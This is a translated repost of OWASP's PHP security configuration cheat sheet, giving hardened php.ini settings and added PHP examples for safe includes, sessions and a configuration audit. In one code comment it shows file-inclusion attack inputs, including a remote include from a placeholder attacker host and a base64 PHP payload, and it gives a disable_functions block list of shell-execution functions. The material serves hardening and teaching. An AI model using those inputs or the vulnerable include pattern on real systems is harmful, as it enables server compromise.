PHP security configuration cheat sheet maintained by OWASP

藏色散人
Release: 2023-04-07 21:40:02

Introduction

The purpose of this page is to help those configuring PHP and the web servers that run it to ensure its security.

Below you will find the correct configuration information for the php.ini file.

php.ini

Some of the following settings need to be adapted to your system, in particular session.save_path, session.cookie_path (for example /var/www/mysite) and session.cookie_domain (for example ExampleSite.com).

You should also be running PHP 7.2 or higher. If you are still on PHP 7.0 or 7.1, a few values below differ slightly (see the inline comments).

Finally, check out the PHP documentation for a reference on each value in the php.ini configuration file.

The original cheat sheet also links to a ready-made php.ini file that contains this configuration.

PHP Error Handling

expose_php              = Off
error_reporting         = E_ALL
display_errors          = Off
display_startup_errors  = Off
log_errors              = On
error_log               = /valid_path/PHP-logs/php_error.log
ignore_repeated_errors  = Off

Please note: keep display_errors set to Off in production, since displayed errors leak file paths, stack traces and sometimes query fragments to whoever triggers them, and make it a habit to check the error log regularly.

PHP General Settings

doc_root                = /path/DocumentRoot/PHP-scripts/
open_basedir            = /path/DocumentRoot/PHP-scripts/
include_path            = /path/PHP-pear/
extension_dir           = /path/PHP-extensions/
mime_magic.magicfile    = /path/PHP-magic.mime
allow_url_fopen         = Off
allow_url_include       = Off
variables_order         = "GPCS"
allow_webdav_methods    = Off
session.gc_maxlifetime  = 600

With allow_url_fopen and allow_url_include both Off, PHP refuses to open or include http://, ftp:// and data: URLs, so a local file inclusion (LFI) bug cannot be escalated into a remote file inclusion (RFI) that pulls attacker-controlled code onto the server. allow_url_include has been deprecated since PHP 7.4 and is Off by default; leave it that way.
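To make the LFI-to-RFI point concrete, here is an added example (mine, not part of the OWASP cheat sheet) of a dynamic include in its vulnerable and hardened forms, with a startup check that the two directives really are Off. The page names, the pages/ directory and the attacker host are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not part of the OWASP cheat sheet: what allow_url_include
// changes about a typical dynamic include. File names and the attacker host
// are hypothetical.

// VULNERABLE: the request parameter is used directly as the include target.
//   ?page=../../../../etc/passwd            local file inclusion (LFI)
//   ?page=http://attacker.example/s.txt     remote file inclusion (RFI), only
//                                           possible when allow_url_include = On
//   ?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
//                                           RFI with no outbound connection at all
//                                           ("<?php phpinfo();"), also gated by
//                                           allow_url_include
// With allow_url_include = Off the last two fail with a warning that the wrapper
// is disabled by allow_url_include=0, and the bug stays a (still serious) LFI.
function render_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: user input selects from a fixed allow-list and never becomes a path.
// open_basedir (see the general settings above) then bounds what even a bug in
// this code could read.
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;
}

function render_page_hardened(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Not found';
        return;
    }
    include $file;
}

// Defence in depth: both directives are PHP_INI_SYSTEM, so code cannot turn them
// off; it can only verify that php.ini did. ini_get() returns "1" for On and
// "" or "0" for Off.
function assert_url_access_disabled(): void
{
    foreach (['allow_url_include', 'allow_url_fopen'] as $directive) {
        if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            throw new RuntimeException("$directive must be Off in php.ini");
        }
    }
}

assert_url_access_disabled();
render_page_hardened($_GET['page'] ?? 'home');
```

The allow-list is the actual fix; the ini check only makes a misconfigured host fail loudly instead of silently becoming exploitable.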

PHP File Upload Handling

file_uploads            = On
upload_tmp_dir          = /path/PHP-uploads/
upload_max_filesize     = 2M
max_file_uploads        = 2

If your application does not use file uploads at all, for instance because the only user input arrives through forms that carry no attachments, set file_uploads to Off. Where uploads are needed, keep upload_max_filesize and max_file_uploads as small as the application allows and point upload_tmp_dir at a directory outside the document root, as the example paths above do.

PHP Executable Handling

enable_dl               = Off
disable_functions       = system, exec, shell_exec, passthru, phpinfo, show_source, highlight_file, popen, proc_open, fopen_with_path, dbmopen, dbase_open, putenv, move_uploaded_file, chdir, mkdir, rmdir, chmod, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo
; see: http://ir.php.net/features.safe-mode
disable_classes         =

These are built-in functions and classes that are dangerous in the hands of an attacker who gains code execution or a file-write primitive; disable every one your application does not use. Two caveats: disable_functions only affects internal (built-in) functions, not user-defined ones, and the list above includes move_uploaded_file, which must stay enabled if file_uploads is On and your application actually handles uploads. disable_classes works the same way for classes.

PHP Session Handling

Several of the session settings deserve attention. Changing session.name away from the default PHPSESSID is a worthwhile exercise, as the default is an easy fingerprint of the stack. Note that comments in php.ini start with ; (the # form was removed in PHP 7).

session.save_path                = /path/PHP-session/
session.name                     = myPHPSESSID
session.auto_start               = Off
session.use_trans_sid            = 0
session.cookie_domain            = full.qualified.domain.name
;session.cookie_path             = /application/path/
session.use_strict_mode          = 1
session.use_cookies              = 1
session.use_only_cookies         = 1
session.cookie_lifetime          = 14400 ; 4 hours
session.cookie_secure            = 1
session.cookie_httponly          = 1
session.cookie_samesite          = Strict
session.cache_expire             = 30
session.sid_length               = 256
session.sid_bits_per_character   = 6 ; PHP 7.2+
session.hash_function            = 1 ; PHP 7.0-7.1
session.hash_bits_per_character  = 6 ; PHP 7.0-7.1
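The same settings can also be enforced from application code, which guards against a php.ini that drifts between environments. The following is an added example, not from the cheat sheet: it passes the session.* values above to session_start(), regenerates the session ID after login, and applies the idle timeout in code. session.cookie_samesite requires PHP 7.3 or later; the login flow and user ID are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not part of the OWASP cheat sheet: enforce the session.*
// settings from code. Every session.* directive is PHP_INI_ALL, so it can be
// passed to session_start() without the "session." prefix (cookie_samesite
// needs PHP 7.3+). The login flow and user id are hypothetical.

function start_hardened_session(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    session_start([
        'name'                   => 'myPHPSESSID',
        'use_strict_mode'        => 1,        // reject IDs the server never issued (anti-fixation)
        'use_only_cookies'       => 1,
        'use_trans_sid'          => 0,        // never carry the ID in URLs
        'cookie_secure'          => 1,        // browser sends the cookie over HTTPS only
        'cookie_httponly'        => 1,        // not readable from JavaScript
        'cookie_samesite'        => 'Strict',
        'cookie_lifetime'        => 14400,    // 4 hours, as in the php.ini above
        'gc_maxlifetime'         => 600,      // server-side data eligible for GC after 10 min idle
        'sid_length'             => 256,
        'sid_bits_per_character' => 6,
    ]);
}

// On successful authentication, issue a fresh ID so a session the attacker
// planted or observed before login cannot be reused (session fixation).
function on_login(string $userId): void
{
    session_regenerate_id(true);   // true: discard the old session data as well
    $_SESSION['user_id']   = $userId;
    $_SESSION['last_seen'] = time();
}

// gc_maxlifetime only makes idle sessions *eligible* for garbage collection,
// which runs probabilistically; enforce the idle limit explicitly per request.
function enforce_idle_timeout(int $maxIdleSeconds = 600): bool
{
    if (isset($_SESSION['last_seen']) && time() - (int) $_SESSION['last_seen'] > $maxIdleSeconds) {
        $_SESSION = [];
        session_destroy();
        return false;
    }
    $_SESSION['last_seen'] = time();
    return true;
}

start_hardened_session();
if (!enforce_idle_timeout()) {
    http_response_code(401);
    exit;
}
```

Passing the options to session_start() is a safety net, not a replacement for php.ini: a script that forgets to call this helper still falls back to whatever the server was configured with, which is why the file-level settings above remain the baseline.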

Some More Security-Paranoid Checks

session.referer_check   = /application/path
memory_limit            = 50M
post_max_size           = 20M
max_execution_time      = 60
report_memleaks         = On
track_errors            = Off
html_errors             = Off
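Rather than eyeballing php.ini, a short script can check the running interpreter against every section above. This is an added example (not the cheat sheet's and not any ready-made php.ini) built on ini_get(); it covers the error-handling, general, upload, executable, session and paranoid-check values. It leaves out track_errors, which was deprecated in PHP 7.2 and removed in 8.0, and move_uploaded_file, which applications that accept uploads need. Run it under the SAPI you are auditing, because php-fpm, mod_php and the CLI can load different php.ini files, and note that the CLI forces max_execution_time to 0.

```php
<?php
declare(strict_types=1);

// Added example, not part of the OWASP cheat sheet: audit the running PHP's
// configuration against the values recommended above using ini_get(). Run it
// under the SAPI you want to check (php-fpm / mod_php can load a different
// php.ini than the CLI; the CLI also forces max_execution_time to 0).

/** php.ini shorthand sizes ("2M", "512K", "1G", "-1") to bytes. */
function ini_bytes(string $value): int
{
    $value  = trim($value);
    $number = (int) $value;                      // "2M" -> 2, "-1" -> -1
    switch (strtoupper((string) substr($value, -1))) {
        case 'G': return $number * 1024 * 1024 * 1024;
        case 'M': return $number * 1024 * 1024;
        case 'K': return $number * 1024;
        default:  return $number;
    }
}

/**
 * Recommended values, keyed by directive. Check types:
 *   bool - On/Off (ini_get() returns "1" for On and "" or "0" for Off)
 *   str  - case-insensitive string match
 *   int  - exact integer match
 *   max  - a finite limit no larger than recommended (0 and -1 mean "unlimited")
 */
function expected_settings(): array
{
    return [
        'expose_php'                     => ['bool', false],
        'display_errors'                 => ['bool', false],
        'display_startup_errors'         => ['bool', false],
        'log_errors'                     => ['bool', true],
        'html_errors'                    => ['bool', false],
        'error_reporting'                => ['int',  E_ALL],
        'allow_url_fopen'                => ['bool', false],
        'allow_url_include'              => ['bool', false],
        'enable_dl'                      => ['bool', false],
        'session.auto_start'             => ['bool', false],
        'session.use_strict_mode'        => ['bool', true],
        'session.use_only_cookies'       => ['bool', true],
        'session.use_trans_sid'          => ['bool', false],
        'session.cookie_secure'          => ['bool', true],
        'session.cookie_httponly'        => ['bool', true],
        'session.cookie_samesite'        => ['str',  'Strict'],
        'session.sid_length'             => ['int',  256],
        'session.sid_bits_per_character' => ['int',  6],
        'upload_max_filesize'            => ['max',  ini_bytes('2M')],
        'post_max_size'                  => ['max',  ini_bytes('20M')],
        'memory_limit'                   => ['max',  ini_bytes('50M')],
        'max_execution_time'             => ['max',  60],
    ];
}

/** Returns null when the directive matches, otherwise a one-line finding. */
function check_directive(string $name, string $type, $want): ?string
{
    $raw = ini_get($name);
    if ($raw === false) {
        return "$name: not a known directive in this PHP build";
    }
    switch ($type) {
        // FILTER_NULL_ON_FAILURE makes non-boolean values such as display_errors=stderr
        // show up as findings instead of being silently read as Off.
        case 'bool': $ok = filter_var($raw, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE) === $want; break;
        case 'str':  $ok = strcasecmp($raw, (string) $want) === 0; break;
        case 'int':  $ok = (int) $raw === $want; break;
        case 'max':  $actual = ini_bytes($raw); $ok = $actual > 0 && $actual <= $want; break;
        default:     $ok = false;
    }
    if ($ok) {
        return null;
    }
    $wantText = is_bool($want) ? ($want ? 'On' : 'Off') : (string) $want;
    return sprintf('%s = "%s" (recommended: %s)', $name, $raw, $wantText);
}

/** Entries of the disable_functions list above that are still callable. */
function still_callable(array $wanted): array
{
    $disabled = array_map('strtolower', array_map('trim', explode(',', (string) ini_get('disable_functions'))));
    $result = [];
    foreach ($wanted as $fn) {
        // function_exists() is false both for functions absent from this build and for disabled ones
        if (!in_array(strtolower($fn), $disabled, true) && function_exists($fn)) {
            $result[] = $fn;
        }
    }
    return $result;
}

function run_audit(): array
{
    $findings = [];
    foreach (expected_settings() as $name => list($type, $want)) {
        $finding = check_directive($name, $type, $want);
        if ($finding !== null) {
            $findings[] = $finding;
        }
    }
    $dangerous = ['system', 'exec', 'shell_exec', 'passthru', 'phpinfo', 'show_source',
        'highlight_file', 'popen', 'proc_open', 'putenv', 'chdir', 'mkdir', 'rmdir',
        'chmod', 'rename', 'posix_mkfifo'];
    foreach (still_callable($dangerous) as $fn) {
        $findings[] = "disable_functions: $fn is still callable";
    }
    return $findings;
}

$findings = run_audit();
echo $findings ? implode(PHP_EOL, $findings) . PHP_EOL : 'php.ini matches the cheat sheet' . PHP_EOL;
exit($findings ? 1 : 0);   // non-zero exit code so a CI pipeline can fail the build
```

Deploy it as a temporary file under the web root, fetch it once, and delete it; it reads configuration only, but like phpinfo() it tells an attacker exactly what your hardening looks like.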

Original English version:

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/PHP_Configuration_Cheat_Sheet.md

Source: learnku.com